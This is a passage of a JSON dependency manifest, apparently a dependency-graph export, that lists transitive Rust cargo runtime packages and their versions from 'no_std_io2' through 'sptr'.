70003185,"package_name":"no_std_io2","ecosystem":"cargo","requirements":"0.9.4","direct":false,"kind":"runtime","optional":false},{"id":25970003186,"package_name":"nom","ecosystem":"cargo","requirements":"7.1.3","direct":false,"kind":"runtime","optional":false},{"id":25970003187,"package_name":"nom","ecosystem":"cargo","requirements":"8.0.0","direct":false,"kind":"runtime","optional":false},{"id":25970003188,"package_name":"notify","ecosystem":"cargo","requirements":"8.2.0","direct":false,"kind":"runtime","optional":false},{"id":25970003189,"package_name":"notify-types","ecosystem":"cargo","requirements":"2.1.0","direct":false,"kind":"runtime","optional":false},{"id":25970003190,"package_name":"nu-ansi-term","ecosystem":"cargo","requirements":"0.50.1","direct":false,"kind":"runtime","optional":false},{"id":25970003191,"package_name":"num","ecosystem":"cargo","requirements":"0.4.2","direct":false,"kind":"runtime","optional":false},{"id":25970003192,"package_name":"num-bigint","ecosystem":"cargo","requirements":"0.4.6","direct":false,"kind":"runtime","optional":false},{"id":25970003193,"package_name":"num-bigint-dig","ecosystem":"cargo","requirements":"0.8.6","direct":false,"kind":"runtime","optional":false},{"id":25970003194,"package_name":"num-complex","ecosystem":"cargo","requirements":"0.4.6","direct":false,"kind":"runtime","optional":false},{"id":25970003195,"package_name":"num-conv","ecosystem":"cargo","requirements":"0.2.0","direct":false,"kind":"runtime","optional":false},{"id":25970003196,"package_name":"num-derive","ecosystem":"cargo","requirements":"0.4.2","direct":false,"kind":"runtime","optional":false},{"id":25970003197,"package_name":"num-integer","ecosystem":"cargo","requirements":"0.1.46","direct":false,"kind":"runtime","optional":false},{"id":25970003198,"package_name":"num-iter","ecosystem":"cargo","requirements":"0.1.44","direct":false,"kind":"runtime","optional":false},{"id":25970003199,"package_name":"num-rational","ecosystem":"cargo","requirements":"0.4.2","direct":false,"kind":"runtime","optional":false},{"id":25970003200,"package_name":"num-traits","ecosystem":"cargo","requirements":"0.2.19","direct":false,"kind":"runtime","optional":false},{"id":25970003201,"package_name":"num_cpus","ecosystem":"cargo","requirements":"1.16.0","direct":false,"kind":"runtime","optional":false},{"id":25970003202,"package_name":"objc2","ecosystem":"cargo","requirements":"0.6.4","direct":false,"kind":"runtime","optional":false},{"id":25970003203,"package_name":"objc2-core-foundation","ecosystem":"cargo","requirements":"0.3.2","direct":false,"kind":"runtime","optional":false},{"id":25970003204,"package_name":"objc2-encode","ecosystem":"cargo","requirements":"4.1.0","direct":false,"kind":"runtime","optional":false},{"id":25970003205,"package_name":"objc2-foundation","ecosystem":"cargo","requirements":"0.3.2","direct":false,"kind":"runtime","optional":false},{"id":25970003206,"package_name":"objc2-metal","ecosystem":"cargo","requirements":"0.3.2","direct":false,"kind":"runtime","optional":false},{"id":25970003207,"package_name":"objc2-quartz-core","ecosystem":"cargo","requirements":"0.3.2","direct":false,"kind":"runtime","optional":false},{"id":25970003208,"package_name":"object","ecosystem":"cargo","requirements":"0.36.3","direct":false,"kind":"runtime","optional":false},{"id":25970003209,"package_name":"ocb3","ecosystem":"cargo","requirements":"0.1.0","direct":false,"kind":"runtime","optional":false},{"id":25970003210,"package_name":"oid-registry","ecosystem":"cargo","requirements":"0.6.1","direct":false,"kind":"runtime","optional":false},{"id":25970003211,"package_name":"once_cell","ecosystem":"cargo","requirements":"1.21.3","direct":false,"kind":"runtime","optional":false},{"id":25970003212,"package_name":"oorandom","ecosystem":"cargo","requirements":"11.1.5","direct":false,"kind":"runtime","optional":false},{"id":25970003213,"package_name":"opaque-debug","ecosystem":"cargo","requirements":"0.3.1","direct":false,"kind":"runtime","optional":false},{"id":25970003214,"package_name":"open","ecosystem":"cargo","requirements":"5.1.2","direct":false,"kind":"runtime","optional":false},{"id":25970003215,"package_name":"openssl","ecosystem":"cargo","requirements":"0.10.80","direct":false,"kind":"runtime","optional":false},{"id":25970003216,"package_name":"openssl-macros","ecosystem":"cargo","requirements":"0.1.1","direct":false,"kind":"runtime","optional":false},{"id":25970003217,"package_name":"openssl-probe","ecosystem":"cargo","requirements":"0.1.5","direct":false,"kind":"runtime","optional":false},{"id":25970003218,"package_name":"openssl-src","ecosystem":"cargo","requirements":"300.5.0+3.5.0","direct":false,"kind":"runtime","optional":false},{"id":25970003219,"package_name":"openssl-sys","ecosystem":"cargo","requirements":"0.9.116","direct":false,"kind":"runtime","optional":false},{"id":25970003220,"package_name":"opentelemetry","ecosystem":"cargo","requirements":"0.32.0","direct":false,"kind":"runtime","optional":false},{"id":25970003221,"package_name":"opentelemetry-http","ecosystem":"cargo","requirements":"0.32.0","direct":false,"kind":"runtime","optional":false},{"id":25970003222,"package_name":"opentelemetry-otlp","ecosystem":"cargo","requirements":"0.32.0","direct":false,"kind":"runtime","optional":false},{"id":25970003223,"package_name":"opentelemetry-proto","ecosystem":"cargo","requirements":"0.32.0","direct":false,"kind":"runtime","optional":false},{"id":25970003224,"package_name":"opentelemetry-semantic-conventions","ecosystem":"cargo","requirements":"0.32.1","direct":false,"kind":"runtime","optional":false},{"id":25970003225,"package_name":"opentelemetry_sdk","ecosystem":"cargo","requirements":"0.32.1","direct":false,"kind":"runtime","optional":false},{"id":25970003226,"package_name":"ordered-float","ecosystem":"cargo","requirements":"4.6.0","direct":false,"kind":"runtime","optional":false},{"id":25970003227,"package_name":"os_pipe","ecosystem":"cargo","requirements":"1.2.1","direct":false,"kind":"runtime","optional":false},{"id":25970003228,"package_name":"outref","ecosystem":"cargo","requirements":"0.5.1","direct":false,"kind":"runtime","optional":false},{"id":25970003229,"package_name":"p12","ecosystem":"cargo","requirements":"0.6.3","direct":false,"kind":"runtime","optional":false},{"id":25970003230,"package_name":"p224","ecosystem":"cargo","requirements":"0.13.2","direct":false,"kind":"runtime","optional":false},{"id":25970003231,"package_name":"p256","ecosystem":"cargo","requirements":"0.13.2","direct":false,"kind":"runtime","optional":false},{"id":25970003232,"package_name":"p384","ecosystem":"cargo","requirements":"0.13.0","direct":false,"kind":"runtime","optional":false},{"id":25970003233,"package_name":"p521","ecosystem":"cargo","requirements":"0.13.3","direct":false,"kind":"runtime","optional":false},{"id":25970003234,"package_name":"par-core","ecosystem":"cargo","requirements":"2.0.0","direct":false,"kind":"runtime","optional":false},{"id":25970003235,"package_name":"parking","ecosystem":"cargo","requirements":"2.2.1","direct":false,"kind":"runtime","optional":false},{"id":25970003236,"package_name":"parking_lot","ecosystem":"cargo","requirements":"0.12.3","direct":false,"kind":"runtime","optional":false},{"id":25970003237,"package_name":"parking_lot_core","ecosystem":"cargo","requirements":"0.9.9","direct":false,"kind":"runtime","optional":false},{"id":25970003238,"package_name":"password-hash","ecosystem":"cargo","requirements":"0.6.1","direct":false,"kind":"runtime","optional":false},{"id":25970003239,"package_name":"paste","ecosystem":"cargo","requirements":"1.0.15","direct":false,"kind":"runtime","optional":false},{"id":25970003240,"package_name":"path-clean","ecosystem":"cargo","requirements":"0.1.0","direct":false,"kind":"runtime","optional":false},{"id":25970003241,"package_name":"path-dedot","ecosystem":"cargo","requirements":"3.1.1","direct":false,"kind":"runtime","optional":false},{"id":25970003242,"package_name":"pathdiff","ecosystem":"cargo","requirements":"0.2.1","direct":false,"kind":"runtime","optional":false},{"id":25970003243,"package_name":"pbkdf2","ecosystem":"cargo","requirements":"0.12.2","direct":false,"kind":"runtime","optional":false},{"id":25970003244,"package_name":"pem-rfc7468","ecosystem":"cargo","requirements":"0.7.0","direct":false,"kind":"runtime","optional":false},{"id":25970003245,"package_name":"percent-encoding","ecosystem":"cargo","requirements":"2.3.2","direct":false,"kind":"runtime","optional":false},{"id":25970003246,"package_name":"pest","ecosystem":"cargo","requirements":"2.7.15","direct":false,"kind":"runtime","optional":false},{"id":25970003247,"package_name":"pest_derive","ecosystem":"cargo","requirements":"2.7.15","direct":false,"kind":"runtime","optional":false},{"id":25970003248,"package_name":"pest_generator","ecosystem":"cargo","requirements":"2.7.15","direct":false,"kind":"runtime","optional":false},{"id":25970003249,"package_name":"pest_meta","ecosystem":"cargo","requirements":"2.7.15","direct":false,"kind":"runtime","optional":false},{"id":25970003250,"package_name":"phc","ecosystem":"cargo","requirements":"0.6.1","direct":false,"kind":"runtime","optional":false},{"id":25970003251,"package_name":"phf","ecosystem":"cargo","requirements":"0.11.2","direct":false,"kind":"runtime","optional":false},{"id":25970003252,"package_name":"phf","ecosystem":"cargo","requirements":"0.13.1","direct":false,"kind":"runtime","optional":false},{"id":25970003253,"package_name":"phf_generator","ecosystem":"cargo","requirements":"0.11.2","direct":false,"kind":"runtime","optional":false},{"id":25970003254,"package_name":"phf_generator","ecosystem":"cargo","requirements":"0.13.1","direct":false,"kind":"runtime","optional":false},{"id":25970003255,"package_name":"phf_macros","ecosystem":"cargo","requirements":"0.11.2","direct":false,"kind":"runtime","optional":false},{"id":25970003256,"package_name":"phf_macros","ecosystem":"cargo","requirements":"0.13.1","direct":false,"kind":"runtime","optional":false},{"id":25970003257,"package_name":"phf_shared","ecosystem":"cargo","requirements":"0.11.2","direct":false,"kind":"runtime","optional":false},{"id":25970003258,"package_name":"phf_shared","ecosystem":"cargo","requirements":"0.13.1","direct":false,"kind":"runtime","optional":false},{"id":25970003259,"package_name":"pin-project","ecosystem":"cargo","requirements":"1.1.5","direct":false,"kind":"runtime","optional":false},{"id":25970003260,"package_name":"pin-project-internal","ecosystem":"cargo","requirements":"1.1.5","direct":false,"kind":"runtime","optional":false},{"id":25970003261,"package_name":"pin-project-lite","ecosystem":"cargo","requirements":"0.2.14","direct":false,"kind":"runtime","optional":false},{"id":25970003262,"package_name":"pin-utils","ecosystem":"cargo","requirements":"0.1.0","direct":false,"kind":"runtime","optional":false},{"id":25970003263,"package_name":"pkcs1","ecosystem":"cargo","requirements":"0.7.5","direct":false,"kind":"runtime","optional":false},{"id":25970003264,"package_name":"pkcs5","ecosystem":"cargo","requirements":"0.7.1","direct":false,"kind":"runtime","optional":false},{"id":25970003265,"package_name":"pkcs8","ecosystem":"cargo","requirements":"0.10.2","direct":false,"kind":"runtime","optional":false},{"id":25970003266,"package_name":"pkcs8","ecosystem":"cargo","requirements":"0.11.0-rc.11","direct":false,"kind":"runtime","optional":false},{"id":25970003267,"package_name":"pkg-config","ecosystem":"cargo","requirements":"0.3.30","direct":false,"kind":"runtime","optional":false},{"id":25970003268,"package_name":"plist","ecosystem":"cargo","requirements":"1.9.0","direct":false,"kind":"runtime","optional":false},{"id":25970003269,"package_name":"plotters","ecosystem":"cargo","requirements":"0.3.7","direct":false,"kind":"runtime","optional":false},{"id":25970003270,"package_name":"plotters-backend","ecosystem":"cargo","requirements":"0.3.7","direct":false,"kind":"runtime","optional":false},{"id":25970003271,"package_name":"plotters-svg","ecosystem":"cargo","requirements":"0.3.7","direct":false,"kind":"runtime","optional":false},{"id":25970003272,"package_name":"png","ecosystem":"cargo","requirements":"0.17.13","direct":false,"kind":"runtime","optional":false},{"id":25970003273,"package_name":"polling","ecosystem":"cargo","requirements":"3.11.0","direct":false,"kind":"runtime","optional":false},{"id":25970003274,"package_name":"polyval","ecosystem":"cargo","requirements":"0.6.2","direct":false,"kind":"runtime","optional":false},{"id":25970003275,"package_name":"portable-atomic","ecosystem":"cargo","requirements":"1.14.0","direct":false,"kind":"runtime","optional":false},{"id":25970003276,"package_name":"potential_utf","ecosystem":"cargo","requirements":"0.1.3","direct":false,"kind":"runtime","optional":false},{"id":25970003277,"package_name":"powerfmt","ecosystem":"cargo","requirements":"0.2.0","direct":false,"kind":"runtime","optional":false},{"id":25970003278,"package_name":"ppv-lite86","ecosystem":"cargo","requirements":"0.2.17","direct":false,"kind":"runtime","optional":false},{"id":25970003279,"package_name":"prefix-trie","ecosystem":"cargo","requirements":"0.7.0","direct":false,"kind":"runtime","optional":false},{"id":25970003280,"package_name":"presser","ecosystem":"cargo","requirements":"0.3.1","direct":false,"kind":"runtime","optional":false},{"id":25970003281,"package_name":"pretty_assertions","ecosystem":"cargo","requirements":"1.4.1","direct":false,"kind":"runtime","optional":false},{"id":25970003282,"package_name":"pretty_yaml","ecosystem":"cargo","requirements":"0.5.0","direct":false,"kind":"runtime","optional":false},{"id":25970003283,"package_name":"prettyplease","ecosystem":"cargo","requirements":"0.2.37","direct":false,"kind":"runtime","optional":false},{"id":25970003284,"package_name":"primeorder","ecosystem":"cargo","requirements":"0.13.6","direct":false,"kind":"runtime","optional":false},{"id":25970003285,"package_name":"proc-macro-crate","ecosystem":"cargo","requirements":"3.4.0","direct":false,"kind":"runtime","optional":false},{"id":25970003286,"package_name":"proc-macro2","ecosystem":"cargo","requirements":"1.0.101","direct":false,"kind":"runtime","optional":false},{"id":25970003287,"package_name":"profiling","ecosystem":"cargo","requirements":"1.0.15","direct":false,"kind":"runtime","optional":false},{"id":25970003288,"package_name":"proptest","ecosystem":"cargo","requirements":"1.9.0","direct":false,"kind":"runtime","optional":false},{"id":25970003289,"package_name":"prost","ecosystem":"cargo","requirements":"0.14.4","direct":false,"kind":"runtime","optional":false},{"id":25970003290,"package_name":"prost-derive","ecosystem":"cargo","requirements":"0.14.4","direct":false,"kind":"runtime","optional":false},{"id":25970003291,"package_name":"prost-types","ecosystem":"cargo","requirements":"0.14.4","direct":false,"kind":"runtime","optional":false},{"id":25970003292,"package_name":"psm","ecosystem":"cargo","requirements":"0.1.21","direct":false,"kind":"runtime","optional":false},{"id":25970003293,"package_name":"pulldown-cmark","ecosystem":"cargo","requirements":"0.11.2","direct":false,"kind":"runtime","optional":false},{"id":25970003294,"package_name":"qbsdiff","ecosystem":"cargo","requirements":"1.4.4","direct":false,"kind":"runtime","optional":false},{"id":25970003295,"package_name":"quick-error","ecosystem":"cargo","requirements":"1.2.3","direct":false,"kind":"runtime","optional":false},{"id":25970003296,"package_name":"quick-error","ecosystem":"cargo","requirements":"2.0.1","direct":false,"kind":"runtime","optional":false},{"id":25970003297,"package_name":"quick-xml","ecosystem":"cargo","requirements":"0.39.4","direct":false,"kind":"runtime","optional":false},{"id":25970003298,"package_name":"quinn","ecosystem":"cargo","requirements":"0.11.8","direct":false,"kind":"runtime","optional":false},{"id":25970003299,"package_name":"quinn-proto","ecosystem":"cargo","requirements":"0.11.16","direct":false,"kind":"runtime","optional":false},{"id":25970003300,"package_name":"quinn-udp","ecosystem":"cargo","requirements":"0.5.9","direct":false,"kind":"runtime","optional":false},{"id":25970003301,"package_name":"quote","ecosystem":"cargo","requirements":"1.0.45","direct":false,"kind":"runtime","optional":false},{"id":25970003302,"package_name":"r-efi","ecosystem":"cargo","requirements":"5.3.0","direct":false,"kind":"runtime","optional":false},{"id":25970003303,"package_name":"radium","ecosystem":"cargo","requirements":"0.7.0","direct":false,"kind":"runtime","optional":false},{"id":25970003304,"package_name":"radix_trie","ecosystem":"cargo","requirements":"0.2.1","direct":false,"kind":"runtime","optional":false},{"id":25970003305,"package_name":"rand","ecosystem":"cargo","requirements":"0.8.5","direct":false,"kind":"runtime","optional":false},{"id":25970003306,"package_name":"rand","ecosystem":"cargo","requirements":"0.9.2","direct":false,"kind":"runtime","optional":false},{"id":25970003307,"package_name":"rand","ecosystem":"cargo","requirements":"0.10.2","direct":false,"kind":"runtime","optional":false},{"id":25970003308,"package_name":"rand_chacha","ecosystem":"cargo","requirements":"0.3.1","direct":false,"kind":"runtime","optional":false},{"id":25970003309,"package_name":"rand_chacha","ecosystem":"cargo","requirements":"0.9.0","direct":false,"kind":"runtime","optional":false},{"id":25970003310,"package_name":"rand_core","ecosystem":"cargo","requirements":"0.6.4","direct":false,"kind":"runtime","optional":false},{"id":25970003311,"package_name":"rand_core","ecosystem":"cargo","requirements":"0.9.3","direct":false,"kind":"runtime","optional":false},{"id":25970003312,"package_name":"rand_core","ecosystem":"cargo","requirements":"0.10.0","direct":false,"kind":"runtime","optional":false},{"id":25970003313,"package_name":"rand_pcg","ecosystem":"cargo","requirements":"0.10.2","direct":false,"kind":"runtime","optional":false},{"id":25970003314,"package_name":"rand_xorshift","ecosystem":"cargo","requirements":"0.4.0","direct":false,"kind":"runtime","optional":false},{"id":25970003315,"package_name":"range-alloc","ecosystem":"cargo","requirements":"0.1.3","direct":false,"kind":"runtime","optional":false},{"id":25970003316,"package_name":"raw-window-handle","ecosystem":"cargo","requirements":"0.6.2","direct":false,"kind":"runtime","optional":false},{"id":25970003317,"package_name":"raw-window-metal","ecosystem":"cargo","requirements":"1.1.0","direct":false,"kind":"runtime","optional":false},{"id":25970003318,"package_name":"rayon","ecosystem":"cargo","requirements":"1.11.0","direct":false,"kind":"runtime","optional":false},{"id":25970003319,"package_name":"rayon-core","ecosystem":"cargo","requirements":"1.13.0","direct":false,"kind":"runtime","optional":false},{"id":25970003320,"package_name":"rc2","ecosystem":"cargo","requirements":"0.8.1","direct":false,"kind":"runtime","optional":false},{"id":25970003321,"package_name":"redox_syscall","ecosystem":"cargo","requirements":"0.4.1","direct":false,"kind":"runtime","optional":false},{"id":25970003322,"package_name":"redox_syscall","ecosystem":"cargo","requirements":"0.5.13","direct":false,"kind":"runtime","optional":false},{"id":25970003323,"package_name":"ref-cast","ecosystem":"cargo","requirements":"1.0.22","direct":false,"kind":"runtime","optional":false},{"id":25970003324,"package_name":"ref-cast-impl","ecosystem":"cargo","requirements":"1.0.22","direct":false,"kind":"runtime","optional":false},{"id":25970003325,"package_name":"regalloc2","ecosystem":"cargo","requirements":"0.11.1","direct":false,"kind":"runtime","optional":false},{"id":25970003326,"package_name":"regex","ecosystem":"cargo","requirements":"1.12.2","direct":false,"kind":"runtime","optional":false},{"id":25970003327,"package_name":"regex-automata","ecosystem":"cargo","requirements":"0.4.13","direct":false,"kind":"runtime","optional":false},{"id":25970003328,"package_name":"regex-lite","ecosystem":"cargo","requirements":"0.1.9","direct":false,"kind":"runtime","optional":false},{"id":25970003329,"package_name":"regex-syntax","ecosystem":"cargo","requirements":"0.8.8","direct":false,"kind":"runtime","optional":false},{"id":25970003330,"package_name":"relative-path","ecosystem":"cargo","requirements":"1.9.2","direct":false,"kind":"runtime","optional":false},{"id":25970003331,"package_name":"reqwest","ecosystem":"cargo","requirements":"0.12.5","direct":false,"kind":"runtime","optional":false},{"id":25970003332,"package_name":"resb","ecosystem":"cargo","requirements":"0.1.2","direct":false,"kind":"runtime","optional":false},{"id":25970003333,"package_name":"resolv-conf","ecosystem":"cargo","requirements":"0.7.0","direct":false,"kind":"runtime","optional":false},{"id":25970003334,"package_name":"rfc6979","ecosystem":"cargo","requirements":"0.4.0","direct":false,"kind":"runtime","optional":false},{"id":25970003335,"package_name":"ring","ecosystem":"cargo","requirements":"0.17.14","direct":false,"kind":"runtime","optional":false},{"id":25970003336,"package_name":"ripemd","ecosystem":"cargo","requirements":"0.1.3","direct":false,"kind":"runtime","optional":false},{"id":25970003337,"package_name":"ron","ecosystem":"cargo","requirements":"0.12.0","direct":false,"kind":"runtime","optional":false},{"id":25970003338,"package_name":"rowan","ecosystem":"cargo","requirements":"0.15.15","direct":false,"kind":"runtime","optional":false},{"id":25970003339,"package_name":"rpm","ecosystem":"cargo","requirements":"0.25.1","direct":false,"kind":"runtime","optional":false},{"id":25970003342,"package_name":"rpm-version","ecosystem":"cargo","requirements":"0.5.0","direct":false,"kind":"runtime","optional":false},{"id":25970003350,"package_name":"rsa","ecosystem":"cargo","requirements":"0.9.10","direct":false,"kind":"runtime","optional":false},{"id":25970003351,"package_name":"rsqlite-vfs","ecosystem":"cargo","requirements":"0.1.1","direct":false,"kind":"runtime","optional":false},{"id":25970003352,"package_name":"rstest","ecosystem":"cargo","requirements":"0.22.0","direct":false,"kind":"runtime","optional":false},{"id":25970003353,"package_name":"rstest_macros","ecosystem":"cargo","requirements":"0.22.0","direct":false,"kind":"runtime","optional":false},{"id":25970003354,"package_name":"rusqlite","ecosystem":"cargo","requirements":"0.40.1","direct":false,"kind":"runtime","optional":false},{"id":25970003355,"package_name":"rustc-demangle","ecosystem":"cargo","requirements":"0.1.24","direct":false,"kind":"runtime","optional":false},{"id":25970003356,"package_name":"rustc-hash","ecosystem":"cargo","requirements":"1.1.0","direct":false,"kind":"runtime","optional":false},{"id":25970003357,"package_name":"rustc-hash","ecosystem":"cargo","requirements":"2.1.1","direct":false,"kind":"runtime","optional":false},{"id":25970003358,"package_name":"rustc_version","ecosystem":"cargo","requirements":"0.4.0","direct":false,"kind":"runtime","optional":false},{"id":25970003359,"package_name":"rustcrypto-ff","ecosystem":"cargo","requirements":"0.14.0-rc.0","direct":false,"kind":"runtime","optional":false},{"id":25970003360,"package_name":"rustcrypto-group","ecosystem":"cargo","requirements":"0.14.0-rc.0","direct":false,"kind":"runtime","optional":false},{"id":25970003361,"package_name":"rusticata-macros","ecosystem":"cargo","requirements":"4.1.0","direct":false,"kind":"runtime","optional":false},{"id":25970003362,"package_name":"rustix","ecosystem":"cargo","requirements":"0.38.34","direct":false,"kind":"runtime","optional":false},{"id":25970003363,"package_name":"rustix","ecosystem":"cargo","requirements":"1.1.4","direct":false,"kind":"runtime","optional":false},{"id":25970003364,"package_name":"rustls","ecosystem":"cargo","requirements":"0.23.40","direct":false,"kind":"runtime","optional":false},{"id":25970003365,"package_name":"rustls-native-certs","ecosystem":"cargo","requirements":"0.7.0","direct":false,"kind":"runtime","optional":false},{"id":25970003366,"package_name":"rustls-pemfile","ecosystem":"cargo","requirements":"2.1.2","direct":false,"kind":"runtime","optional":false},{"id":25970003367,"package_name":"rustls-pki-types","ecosystem":"cargo","requirements":"1.12.0","direct":false,"kind":"runtime","optional":false},{"id":25970003368,"package_name":"rustls-tokio-stream","ecosystem":"cargo","requirements":"0.8.0","direct":false,"kind":"runtime","optional":false},{"id":25970003371,"package_name":"rustls-webpki","ecosystem":"cargo","requirements":"0.103.13","direct":false,"kind":"runtime","optional":false},{"id":25970003372,"package_name":"rustversion","ecosystem":"cargo","requirements":"1.0.22","direct":false,"kind":"runtime","optional":false},{"id":25970003373,"package_name":"rusty-fork","ecosystem":"cargo","requirements":"0.3.1","direct":false,"kind":"runtime","optional":false},{"id":25970003374,"package_name":"rustyline","ecosystem":"cargo","requirements":"17.0.0","direct":false,"kind":"runtime","optional":false},{"id":25970003375,"package_name":"rustyline-derive","ecosystem":"cargo","requirements":"0.11.1","direct":false,"kind":"runtime","optional":false},{"id":25970003376,"package_name":"ryu","ecosystem":"cargo","requirements":"1.0.17","direct":false,"kind":"runtime","optional":false},{"id":25970003377,"package_name":"ryu-js","ecosystem":"cargo","requirements":"1.0.1","direct":false,"kind":"runtime","optional":false},{"id":25970003378,"package_name":"saa","ecosystem":"cargo","requirements":"5.6.0","direct":false,"kind":"runtime","optional":false},{"id":25970003379,"package_name":"sacabase","ecosystem":"cargo","requirements":"2.0.0","direct":false,"kind":"runtime","optional":false},{"id":25970003380,"package_name":"safe_arch","ecosystem":"cargo","requirements":"0.7.4","direct":false,"kind":"runtime","optional":false},{"id":25970003381,"package_name":"salsa20","ecosystem":"cargo","requirements":"0.10.2","direct":false,"kind":"runtime","optional":false},{"id":25970003382,"package_name":"same-file","ecosystem":"cargo","requirements":"1.0.6","direct":false,"kind":"runtime","optional":false},{"id":25970003383,"package_name":"scc","ecosystem":"cargo","requirements":"3.7.1","direct":false,"kind":"runtime","optional":false},{"id":25970003384,"package_name":"schannel","ecosystem":"cargo","requirements":"0.1.23","direct":false,"kind":"runtime","optional":false},{"id":25970003385,"package_name":"scoped-tls","ecosystem":"cargo","requirements":"1.0.1","direct":false,"kind":"runtime","optional":false},{"id":25970003386,"package_name":"scopeguard","ecosystem":"cargo","requirements":"1.2.0","direct":false,"kind":"runtime","optional":false},{"id":25970003387,"package_name":"scrypt","ecosystem":"cargo","requirements":"0.11.0","direct":false,"kind":"runtime","optional":false},{"id":25970003388,"package_name":"sdd","ecosystem":"cargo","requirements":"4.8.6","direct":false,"kind":"runtime","optional":false},{"id":25970003389,"package_name":"sec1","ecosystem":"cargo","requirements":"0.7.3","direct":false,"kind":"runtime","optional":false},{"id":25970003390,"package_name":"sec1","ecosystem":"cargo","requirements":"0.8.0-rc.13","direct":false,"kind":"runtime","optional":false},{"id":25970003391,"package_name":"security-framework","ecosystem":"cargo","requirements":"2.10.0","direct":false,"kind":"runtime","optional":false},{"id":25970003392,"package_name":"security-framework","ecosystem":"cargo","requirements":"3.3.0","direct":false,"kind":"runtime","optional":false},{"id":25970003393,"package_name":"security-framework-sys","ecosystem":"cargo","requirements":"2.14.0","direct":false,"kind":"runtime","optional":false},{"id":25970003394,"package_name":"semver","ecosystem":"cargo","requirements":"1.0.25","direct":false,"kind":"runtime","optional":false},{"id":25970003395,"package_name":"seq-macro","ecosystem":"cargo","requirements":"0.3.6","direct":false,"kind":"runtime","optional":false},{"id":25970003396,"package_name":"serde","ecosystem":"cargo","requirements":"1.0.228","direct":false,"kind":"runtime","optional":false},{"id":25970003397,"package_name":"serde-wasm-bindgen","ecosystem":"cargo","requirements":"0.5.0","direct":false,"kind":"runtime","optional":false},{"id":25970003398,"package_name":"serde_bytes","ecosystem":"cargo","requirements":"0.11.14","direct":false,"kind":"runtime","optional":false},{"id":25970003399,"package_name":"serde_core","ecosystem":"cargo","requirements":"1.0.228","direct":false,"kind":"runtime","optional":false},{"id":25970003400,"package_name":"serde_derive","ecosystem":"cargo","requirements":"1.0.228","direct":false,"kind":"runtime","optional":false},{"id":25970003401,"package_name":"serde_json","ecosystem":"cargo","requirements":"1.0.140","direct":false,"kind":"runtime","optional":false},{"id":25970003402,"package_name":"serde_repr","ecosystem":"cargo","requirements":"0.1.19","direct":false,"kind":"runtime","optional":false},{"id":25970003403,"package_name":"serde_spanned","ecosystem":"cargo","requirements":"1.0.4","direct":false,"kind":"runtime","optional":false},{"id":25970003404,"package_name":"serde_urlencoded","ecosystem":"cargo","requirements":"0.7.1","direct":false,"kind":"runtime","optional":false},{"id":25970003405,"package_name":"serdect","ecosystem":"cargo","requirements":"0.2.0","direct":false,"kind":"runtime","optional":false},{"id":25970003406,"package_name":"serdect","ecosystem":"cargo","requirements":"0.4.2","direct":false,"kind":"runtime","optional":false},{"id":25970003407,"package_name":"sha1","ecosystem":"cargo","requirements":"0.10.6","direct":false,"kind":"runtime","optional":false},{"id":25970003408,"package_name":"sha1_smol","ecosystem":"cargo","requirements":"1.0.1","direct":false,"kind":"runtime","optional":false},{"id":25970003409,"package_name":"sha2","ecosystem":"cargo","requirements":"0.10.8","direct":false,"kind":"runtime","optional":false},{"id":25970003410,"package_name":"sha3","ecosystem":"cargo","requirements":"0.10.8","direct":false,"kind":"runtime","optional":false},{"id":25970003411,"package_name":"sha3","ecosystem":"cargo","requirements":"0.11.0-rc.8","direct":false,"kind":"runtime","optional":false},{"id":25970003412,"package_name":"sharded-slab","ecosystem":"cargo","requirements":"0.1.7","direct":false,"kind":"runtime","optional":false},{"id":25970003413,"package_name":"shlex","ecosystem":"cargo","requirements":"1.3.0","direct":false,"kind":"runtime","optional":false},{"id":25970003414,"package_name":"signal-hook","ecosystem":"cargo","requirements":"0.3.17","direct":false,"kind":"runtime","optional":false},{"id":25970003415,"package_name":"signal-hook-mio","ecosystem":"cargo","requirements":"0.2.4","direct":false,"kind":"runtime","optional":false},{"id":25970003416,"package_name":"signal-hook-registry","ecosystem":"cargo","requirements":"1.4.2","direct":false,"kind":"runtime","optional":false},{"id":25970003417,"package_name":"signature","ecosystem":"cargo","requirements":"2.2.0","direct":false,"kind":"runtime","optional":false},{"id":25970003418,"package_name":"signature","ecosystem":"cargo","requirements":"3.0.0-rc.10","direct":false,"kind":"runtime","optional":false},{"id":25970003419,"package_name":"simd-adler32","ecosystem":"cargo","requirements":"0.3.7","direct":false,"kind":"runtime","optional":false},{"id":25970003420,"package_name":"simdutf8","ecosystem":"cargo","requirements":"0.1.5","direct":false,"kind":"runtime","optional":false},{"id":25970003421,"package_name":"similar","ecosystem":"cargo","requirements":"2.7.0","direct":false,"kind":"runtime","optional":false},{"id":25970003422,"package_name":"siphasher","ecosystem":"cargo","requirements":"0.3.11","direct":false,"kind":"runtime","optional":false},{"id":25970003423,"package_name":"siphasher","ecosystem":"cargo","requirements":"1.0.1","direct":false,"kind":"runtime","optional":false},{"id":25970003424,"package_name":"slab","ecosystem":"cargo","requirements":"0.4.9","direct":false,"kind":"runtime","optional":false},{"id":25970003425,"package_name":"slotmap","ecosystem":"cargo","requirements":"1.0.7","direct":false,"kind":"runtime","optional":false},{"id":25970003426,"package_name":"slug","ecosystem":"cargo","requirements":"0.1.5","direct":false,"kind":"runtime","optional":false},{"id":25970003427,"package_name":"sm3","ecosystem":"cargo","requirements":"0.4.2","direct":false,"kind":"runtime","optional":false},{"id":25970003428,"package_name":"smallvec","ecosystem":"cargo","requirements":"1.15.1","direct":false,"kind":"runtime","optional":false},{"id":25970003429,"package_name":"smartstring","ecosystem":"cargo","requirements":"1.0.1","direct":false,"kind":"runtime","optional":false},{"id":25970003430,"package_name":"socket2","ecosystem":"cargo","requirements":"0.5.5","direct":false,"kind":"runtime","optional":false},{"id":25970003431,"package_name":"socket2","ecosystem":"cargo","requirements":"0.6.4","direct":false,"kind":"runtime","optional":false},{"id":25970003432,"package_name":"solana-nohash-hasher","ecosystem":"cargo","requirements":"0.2.1","direct":false,"kind":"runtime","optional":false},{"id":25970003433,"package_name":"sourcemap","ecosystem":"cargo","requirements":"9.2.0","direct":false,"kind":"runtime","optional":false},{"id":25970003434,"package_name":"spin","ecosystem":"cargo","requirements":"0.9.8","direct":false,"kind":"runtime","optional":false},{"id":25970003435,"package_name":"spirv","ecosystem":"cargo","requirements":"0.4.0+sdk-1.4.341.0","direct":false,"kind":"runtime","optional":false},{"id":25970003436,"package_name":"spki","ecosystem":"cargo","requirements":"0.7.3","direct":false,"kind":"runtime","optional":false},{"id":25970003437,"package_name":"spki","ecosystem":"cargo","requirements":"0.8.0-rc.4","direct":false,"kind":"runtime","optional":false},{"id":25970003438,"package_name":"sptr","ecosystem":"cargo","requ